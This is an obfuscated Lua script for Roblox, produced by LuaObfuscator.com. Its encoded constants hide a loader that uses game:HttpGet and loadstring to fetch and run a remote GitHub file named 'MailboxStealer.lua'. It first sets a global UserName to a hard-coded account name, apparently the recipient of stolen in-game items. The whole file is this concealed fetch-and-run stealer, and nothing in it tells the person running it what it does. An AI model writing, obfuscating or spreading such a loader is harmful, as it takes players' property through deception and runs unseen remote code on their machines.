--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v100=v5(v85,v19);v19=nil;return v100;else return v85;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v86=0 -(1637 -(1523 + 114)) ;local v87;while true do if (v86==(0 -0)) then v87=(v31/(2^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 67 + 7)))) ;return v87-(v87%(569 -(367 + 201))) ;end end else local v88=(1321 -394) -(214 + 713) ;local v89;while true do if (v88==(0 + 0)) then v89=(1 + 1)^(v32-1) ;return (((v31%(v89 + v89))>=v89) and 1) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1065 -(68 + (1954 -(892 + 65))) ;local v36;local v37;while true do if (v35==(1270 -(226 + 1044))) then v36,v37=v1(v16,v18,v18 + (8 -6) );v18=v18 + 2 ;v35=118 -(32 + 85) ;end if ((1 + 0)==v35) then return (v37 * (57 + 199)) + v36 ;end end end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -3) ;v38=351 -(87 + 263) ;end if (v38==(181 -(50 + 17 + 113))) then return (v42 * (66680831 -49903615)) + (v41 * (48056 + 17480)) + (v40 * (628 -372)) + v39 ;end end end local function v24()local v43=952 -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(5 -3)) then v48=v20(v45,37 -16 ,23 + 8 );v49=((v20(v45,1029 -(915 + 82) )==(1 + 0)) and  -((2 + 0) -1)) or 1 ;v43=2 + 1 ;end if (v43==(3 -0)) then if (v48==0) then if (v47==((1959 -(201 + 571)) -(1069 + 118))) then return v49 * (0 -0) ;else local v101=0 -0 ;while true do if (v101==(0 + 0)) then v48=1 -0 ;v46=0;break;end end end elseif (v48==(2031 + 16)) then return ((v47==0) and (v49 * ((792 -(368 + 423))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1041 -((1148 -(116 + 1022)) + 8)) ) * (v46 + (v47/(((29 -22) -5)^(494 -(416 + 26))))) ;end if (v43==1) then v46=3 -2 ;v47=(v20(v45,1 + 0 ,20) * ((3 -1)^(470 -(145 + 172 + 121)))) + v44 ;v43=432 -(44 + 386) ;end if ((1486 -(998 + 488))==v43) then v44=v23();v45=v23();v43=1;end end end local function v25(v50)local v51=0 -0 ;local v52;local v53;while true do if (v51==(10 -7)) then return v6(v53);end if (v51==((1528 -668) -(814 + 45))) then v52=v3(v16,v18,(v18 + v50) -(2 -1) );v18=v18 + v50 ;v51=1 + 1 ;end if ((0 + 0)==v51) then v52=nil;if  not v50 then v50=v23();if (v50==(1080 -(1020 + 60))) then return "";end end v51=886 -(261 + 624) ;end if (2==v51) then v53={};for v93=1, #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=3;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==(1 + 0)) then v57=nil;v58=nil;v54=2;end if (v54==(0 -0)) then v55=0 -0 ;v56=nil;v54=1;end if (v54==(5 -3)) then v59=nil;v60=nil;v54=3;end if (v54~=(3 + 1)) then else while true do if (2~=v55) then else local v99=0 + 0 ;while true do if ((396 -(115 + 281))~=v99) then else v60=nil;v61=nil;v99=2 -1 ;end if ((1 + 0)~=v99) then else v55=7 -4 ;break;end end end if (v55==(10 -7)) then v62=nil;while true do local v102=867 -(550 + 317) ;while true do if ((0 -0)==v102) then if (v56==(0 -0)) then local v116=0 -0 ;while true do if (1==v116) then v59={};v60={v57,v58,nil,v59};v116=2;end if (v116~=2) then else v56=1;break;end if (v116==0) then v57={};v58={};v116=1;end end end if (v56==(286 -(134 + 151))) then local v117=1665 -(970 + 695) ;while true do if (v117==(0 -0)) then v61=v23();v62={};v117=1991 -(582 + 1408) ;end if ((6 -4)==v117) then v56=2 -0 ;break;end if (v117~=(3 -2)) then else for v158=1,v61 do local v159=1824 -(1195 + 629) ;local v160;local v161;local v162;while true do if (v159==1) then v162=nil;while true do if (0~=v160) then else v161=v21();v162=nil;v160=1;end if (v160==1) then if (v161==1) then v162=v21()~=0 ;elseif (v161==2) then v162=v24();elseif (v161==3) then v162=v25();end v62[v158]=v162;break;end end break;end if (v159==0) then v160=0;v161=nil;v159=1;end end end v60[3 -0 ]=v21();v117=243 -(187 + 54) ;end end end v102=1;end if (v102==(781 -(162 + 618))) then if ((2 + 0)==v56) then local v118=0;while true do if (v118==(0 + 0)) then for v163=1,v23() do local v164=0;local v165;while true do if (v164~=(0 -0)) then else v165=v21();if (v20(v165,1 -0 ,1 + 0 )==0) then local v172=0;local v173;local v174;local v175;local v176;local v177;while true do if ((1638 -(1373 + 263))~=v172) then else v177=nil;while true do if (0~=v173) then else v174=0;v175=nil;v173=1;end if (v173~=2) then else while true do if (v174==(1000 -(451 + 549))) then local v180=0;while true do if (v180==0) then v175=v20(v165,1 + 1 ,4 -1 );v176=v20(v165,4,9 -3 );v180=1;end if (v180==1) then v174=1385 -(746 + 638) ;break;end end end if (v174==3) then if (v20(v176,2 + 1 ,3)~=(1 -0)) then else v177[345 -(218 + 123) ]=v62[v177[4]];end v57[v163]=v177;break;end if (v174~=(1583 -(1535 + 46))) then else local v182=0 + 0 ;local v183;while true do if (v182~=(0 + 0)) then else v183=560 -(306 + 254) ;while true do if (v183==(1 + 0)) then v174=5 -2 ;break;end if (v183~=(1467 -(899 + 568))) then else if (v20(v176,1 + 0 ,1)~=1) then else v177[2]=v62[v177[2]];end if (v20(v176,2,4 -2 )==(604 -(268 + 335))) then v177[293 -(60 + 230) ]=v62[v177[3]];end v183=1;end end break;end end end if (v174==(573 -(426 + 146))) then local v184=0 + 0 ;local v185;while true do if (v184~=0) then else v185=1456 -(282 + 1174) ;while true do if (v185~=(811 -(569 + 242))) then else local v188=0;while true do if (v188==(0 -0)) then v177={v22(),v22(),nil,nil};if (v175==0) then local v193=0;local v194;local v195;while true do if (v193==(1252 -(721 + 530))) then while true do if (v194==(1271 -(945 + 326))) then v195=0 -0 ;while true do if (v195~=0) then else v177[3]=v22();v177[4 + 0 ]=v22();break;end end break;end end break;end if (v193==0) then v194=0;v195=nil;v193=701 -(271 + 429) ;end end elseif (v175==(1 + 0)) then v177[1503 -(1408 + 92) ]=v23();elseif (v175==2) then v177[1089 -(461 + 625) ]=v23() -(2^(1304 -(993 + 295))) ;elseif (v175~=(1 + 2)) then else local v198=1171 -(418 + 753) ;while true do if (v198~=0) then else v177[3]=v23() -((1 + 1)^(2 + 14)) ;v177[2 + 2 ]=v22();break;end end end v188=1 + 0 ;end if (v188~=(530 -(406 + 123))) then else v185=1;break;end end end if (v185==1) then v174=1771 -(1749 + 20) ;break;end end break;end end end end break;end if (v173==1) then local v179=0;while true do if (v179==(1 + 0)) then v173=1324 -(1249 + 73) ;break;end if (v179==0) then v176=nil;v177=nil;v179=1 + 0 ;end end end end break;end if (v172~=(1145 -(466 + 679))) then else v173=0;v174=nil;v172=1;end if (1==v172) then v175=nil;v176=nil;v172=4 -2 ;end end end break;end end end for v166=2 -1 ,v23() do v58[v166-1 ]=v28();end v118=1901 -(106 + 1794) ;end if (1==v118) then return v60;end end end break;end end end break;end if (0==v55) then v56=0 + 0 ;v57=nil;v55=1 + 0 ;end if (v55==1) then v58=nil;v59=nil;v55=5 -3 ;end end break;end if (v54==(7 -4)) then v61=nil;v62=nil;v54=118 -(4 + 110) ;end end end local function v29(v63,v64,v65)local v66=v63[1];local v67=v63[2];local v68=v63[3];return function(...)local v69=v66;local v70=v67;local v71=v68;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v90=0,v77 do if (v90>=v71) then v75[v90-v71 ]=v76[v90 + 1 ];else v79[v90]=v76[v90 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=11) then if (v82<=5) then if (v82<=2) then if (v82<=0) then local v103=0;local v104;local v105;while true do if (v103==0) then v104=v81[2];v105=v79[v81[3]];v103=1;end if (v103==1) then v79[v104 + 1 ]=v105;v79[v104]=v105[v81[4]];break;end end elseif (v82>1) then v79[v81[2]]=v65[v81[3]];else do return;end end elseif (v82<=3) then v79[v81[2]]();elseif (v82==4) then v79[v81[2]]=v65[v81[3]];else do return;end end elseif (v82<=8) then if (v82<=6) then for v114=v81[2],v81[3] do v79[v114]=nil;end elseif (v82==7) then local v123=v81[2];local v124,v125=v72(v79[v123](v13(v79,v123 + 1 ,v81[3])));v74=(v125 + v123) -1 ;local v126=0;for v149=v123,v74 do local v150=0;while true do if (v150==0) then v126=v126 + 1 ;v79[v149]=v124[v126];break;end end end else for v151=v81[2],v81[3] do v79[v151]=nil;end end elseif (v82<=9) then local v106=v81[2];v79[v106]=v79[v106](v13(v79,v106 + 1 ,v74));elseif (v82==10) then v79[v81[2]]=v81[3]~=0 ;else local v128=v81[2];local v129=v79[v81[3]];v79[v128 + 1 ]=v129;v79[v128]=v129[v81[4]];end elseif (v82<=17) then if (v82<=14) then if (v82<=12) then v65[v81[3]]=v79[v81[2]];elseif (v82==13) then v79[v81[2]]=v81[3]~=0 ;else local v134=v81[2];v79[v134]=v79[v134](v13(v79,v134 + 1 ,v74));end elseif (v82<=15) then v73=v81[3];elseif (v82>16) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3];end elseif (v82<=20) then if (v82<=18) then v73=v81[3];elseif (v82==19) then v79[v81[2]]();elseif (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82<=21) then v79[v81[2]]=v81[3];elseif (v82>22) then local v138=v81[2];local v139,v140=v72(v79[v138](v13(v79,v138 + 1 ,v81[3])));v74=(v140 + v138) -1 ;local v141=0;for v153=v138,v74 do local v154=0;while true do if (v154==0) then v141=v141 + 1 ;v79[v153]=v139[v141];break;end end end else v65[v81[3]]=v79[v81[2]];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F48652O7253696D6F4E4875622F6170692F6D61696E2F4D61696C626F78537465616C65722E6C756103093O00557365724E616D653203083O00557365724E616D65030D3O0066722O657A617A61636F656D7300233O0012103O00014O0006000100013O0026143O00020001000100040F3O00020001001210000100013O002614000100100001000200040F3O00100001001202000200033O001202000300043O00202O000300030005001210000500064O000D000600014O0017000300064O000900023O00022O001300020001000100040F3O00220001002614000100050001000100040F3O00050001001210000200013O002614000200170001000200040F3O00170001001210000100023O00040F3O00050001002614000200130001000100040F3O00130001001202000300083O001216000300073O001210000300093O001216000300083O001210000200023O00040F3O0013000100040F3O0005000100040F3O0022000100040F3O000200012O00053O00017O00",v9(),...);end
